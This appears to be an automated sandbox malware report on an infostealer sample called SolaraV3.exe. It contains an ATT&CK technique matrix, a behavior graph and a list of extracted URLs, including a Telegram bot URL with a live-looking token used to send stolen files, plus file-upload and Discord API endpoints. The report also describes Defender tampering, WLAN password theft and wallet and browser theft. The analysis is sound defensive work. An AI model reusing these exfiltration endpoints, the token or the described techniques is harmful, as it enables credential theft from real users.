              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts3
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              4
              Disable or Modify Tools
              1
              Credentials In Files
              3
              File and Directory Discovery
              Remote Desktop Protocol31
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts222
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              Security Account Manager58
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              21
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              21
              Obfuscated Files or Information
              NTDS271
              Security Software Discovery
              Distributed Component Object Model1
              Clipboard Data
              3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets2
              Process Discovery
              SSHKeylogging4
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials151
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry
              Proc Filesystem1
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525849 Sample: SolaraV3.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 70 api.telegram.org 2->70 72 ip-api.com 2->72 74 blank-a0m8c.in 2->74 82 Suricata IDS alerts for network traffic 2->82 84 Sigma detected: Capture Wi-Fi password 2->84 86 Multi AV Scanner detection for submitted file 2->86 90 11 other signatures 2->90 11 SolaraV3.exe 22 2->11         started        15 svchost.exe 2->15         started        signatures3 88 Uses the Telegram API (likely for C&C communication) 70->88 process4 dnsIp5 62 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->62 dropped 64 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->64 dropped 66 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 11->66 dropped 68 16 other files (none is malicious) 11->68 dropped 116 Modifies Windows Defender protection settings 11->116 118 Adds a directory exclusion to Windows Defender 11->118 120 Tries to harvest and steal WLAN passwords 11->120 122 3 other signatures 11->122 18 SolaraV3.exe 1 90 11->18         started        80 127.0.0.1 unknown unknown 15->80 file6 signatures7 process8 dnsIp9 76 ip-api.com 208.95.112.1, 49722, 49732, 80 TUT-ASUS United States 18->76 78 api.telegram.org 149.154.167.220, 443, 49733 TELEGRAMRU United Kingdom 18->78 92 Found many strings related to Crypto-Wallets (likely being stolen) 18->92 94 Uses cmd line tools excessively to alter registry or file data 18->94 96 Tries to harvest and steal browser information (history, passwords, etc) 18->96 98 7 other signatures 18->98 22 cmd.exe 1 18->22         started        25 cmd.exe 1 18->25         started        27 cmd.exe 18->27         started        29 35 other processes 18->29 signatures10 process11 signatures12 100 Suspicious powershell command line found 22->100 102 Uses cmd line tools excessively to alter registry or file data 22->102 104 Encrypted powershell cmdline option found 22->104 114 3 other signatures 22->114 31 powershell.exe 22->31         started        34 conhost.exe 22->34         started        106 Modifies Windows Defender protection settings 25->106 108 Removes signatures from Windows Defender 25->108 36 powershell.exe 23 25->36         started        46 2 other processes 25->46 110 Adds a directory exclusion to Windows Defender 27->110 38 powershell.exe 27->38         started        40 conhost.exe 27->40         started        112 Tries to harvest and steal WLAN passwords 29->112 42 getmac.exe 29->42         started        44 systeminfo.exe 29->44         started        48 67 other processes 29->48 process13 file14 124 Loading BitLocker PowerShell Module 36->124 126 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 42->126 128 Writes or reads registry keys via WMI 42->128 58 C:\Users\user\AppData\...\se3yji4z.cmdline, Unicode 48->58 dropped 51 csc.exe 48->51         started        54 Conhost.exe 48->54         started        signatures15 process16 file17 60 C:\Users\user\AppData\Local\...\se3yji4z.dll, PE32 51->60 dropped 56 cvtres.exe 51->56         started        process18

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              SolaraV3.exe55%ReversingLabsWin64.Trojan.Generic
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd3%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              ip-api.com
              208.95.112.1
              truetrue
                unknown
                api.telegram.org
                149.154.167.220
                truetrue
                  unknown
                  blank-a0m8c.in
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocumenttrue
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabSolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpfalse
                        https://github.com/Blank-c/BlankOBFSolaraV3.exe, 00000002.00000003.1576344142.000001FC253B0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1576939508.000001FC253B0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1576455903.000001FC2577A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1576808435.000001FC253B0000.00000004.00000020.00020000.00000000.sdmpfalse
                          https://api.telegram.org/bot%s/%sSolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpfalse
                            https://www.avito.ru/SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpfalse
                              https://duckduckgo.com/ac/?q=SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpfalse
                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0SolaraV3.exefalse
                                  https://github.com/Blank-c/Blank-GrabberiSolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    https://www.ctrip.com/SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#SolaraV3.exefalse
                                        https://python.org/dev/peps/pep-0263/SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmpfalse
                                          https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            https://www.leboncoin.fr/SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                              https://tools.ietf.org/html/rfc2388#section-4.4SolaraV3.exe, 00000002.00000002.2038113836.000001FC24E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://weibo.com/SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  https://api.anonfiles.com/uploadSolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    https://www.msn.comSolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.1785679390.00000267B9182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E80DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F6919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        https://discord.com/api/v9/users/SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            https://www.reddit.com/SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.1728980230.00000267A9111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E6761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                https://www.amazon.ca/SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKSolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameSolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxySolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          https://www.ebay.co.uk/SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.1728980230.00000267A9338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://www.ebay.de/SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeSolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://go.micropowershell.exe, 0000004A.00000002.1847941368.00000239E7395000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerSolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://www.amazon.com/SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            https://contoso.com/Iconpowershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                https://httpbin.org/SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  http://crl.ver)svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sSolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.drfalse
                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleSolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesSolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://www.ecosia.org/newtab/SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1742788429.000001FC2530F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://www.youtube.com/SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                https://allegro.pl/SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sySolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://MD8.mozilla.org/1/mSolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          http://ocsp.sectigo.com0$SolaraV3.exefalse
                                                                                                                            https://www.bbc.co.uk/SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              https://g.live.com/odclientsettings/Prod1C:qmgr.db.26.drfalse
                                                                                                                                http://ip-api.com/line/?fields=hostingrSolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://bugzilla.moSolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    http://tools.ietf.org/html/rfc6125#section-6.4.3SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      https://api.telegram.org/bot%s/%s)SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.1728980230.00000267A9338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          http://logo.veWALLET~2.JSSolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://google.com/mailSolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://logo.veANIFE~1JSOSolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                https://packaging.python.org/specifications/entry-points/SolaraV3.exe, 00000002.00000002.2043602926.000001FC25980000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pySolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://logo.veSolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://www.google.com/SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B08000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        https://www.iqiyi.com/SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          https://foss.heptapod.net/pypy/pypy/-/issues/3539SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://google.com/SolaraV3.exe, 00000002.00000003.1769191684.000001FC253DF000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC253E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://api.gofile.io/getServerrSolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://ocsp.sectigo.com0SolaraV3.exe, rar.exe.1.drfalse
                                                                                                                                                                    http://logo.veWSolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.python.org/download/releases/2.3/mro/.SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.1.drfalse
                                                                                                                                                                        https://contoso.com/Licensepowershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://discordapp.com/api/v9/users/SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceSolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://ip-api.com/json/?fields=225545rSolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specSolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#SolaraV3.exefalse
                                                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.drfalse
                                                                                                                                                                                          http://crl.sectigo.j$SolaraV3.exe, 00000001.00000002.2058209847.000001EA23108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataSolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://yahoo.com/SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://account.bellmedia.cSolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpfalse
